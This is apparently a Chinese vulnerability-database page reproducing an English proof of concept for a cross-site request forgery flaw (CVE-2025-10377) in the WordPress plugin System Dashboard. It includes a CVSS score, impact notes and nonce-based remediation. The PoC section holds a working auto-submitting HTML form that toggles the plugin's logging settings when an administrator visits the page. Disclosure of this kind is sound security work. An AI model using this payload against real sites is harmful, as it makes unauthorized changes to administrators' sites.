关联漏洞
标题:
WordPress plugin System Dashboard 跨站请求伪造漏洞
(CVE-2025-10377)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin System Dashboard 2.8.20及之前版本存在跨站请求伪造漏洞,该漏洞源于sd_toggle_logs函数缺少随机数验证,可能导致跨站请求伪造攻击。
描述
CVE-2025-10377
介绍
# Proof of Concept CVE-2025-10377 Cross-Site Request Forgery (CSRF) in Plugin System Dashboard (Funtion sd_toggle_logs)
**Vulnerability Type:** Cross-Site Request Forgery (CSRF)
**Affected Function:** sd_toggle_logs()
**CVSS v3.1:** 4.3 (Medium)
**Vector:** AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
*(Note: Score reflects unauthorized state change requiring an admin victim and user interaction.)*
**Description of Vulnerability:**
The function `sd_toggle_logs()` processes sensitive operations such as enabling/disabling Page Access Logs, Error Logs, and Email Delivery Logs. However, it relies solely on the `$_REQUEST['log_type']` parameter and a capability check `(current_user_can( 'manage_options' ))` without implementing CSRF protection (e.g., `check_admin_referer()` or a nonce).
As a result, an attacker can lure a logged-in Administrator to visit a malicious page that silently submits a crafted request, causing unintended enable/disable changes to site logging.
## Impact:
- Unauthorized state changes for site logging features (Page Access Log, Error Log, Email Delivery Log).
- If error logging is enabled, the site may begin writing application errors to a file path determined by the plugin (increasing the chance of operational information disclosure via logs), but the direct impact of this issue is the state toggle itself.
## POC
When a logged-in User with `manage_options` visits the attacker’s page, the respective logging feature is toggled without explicit consent.
``` html
<body>
<form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="sd_toggle_logs" />
<input type="hidden" name="log_type" value="errors_log" />
<input type="hidden" name="fast_ajax" value="true" />
<input type="hidden" name="load_plugins[]" value="system-dashboard/system-dashboard.php" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
## Remediation
- Implement WordPress nonces (`check_admin_referer()` or `wp_verify_nonce()`) to validate requests.
- Restrict sensitive actions to POST requests only.
- Avoid relying solely on capability checks for protection against CSRF.
## Video POC
If you're unable to reproduce the issue exactly as described in the report, please refer to the following video demonstration (PoC) for a clear reproduction scenario:
https://youtu.be/WtWYIfEM4W0
文件快照
[4.0K] /data/pocs/b5b0bab670892a0d876dbd66085bb0fe9508ac87
├── [2.5K] POC_csrf.md
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。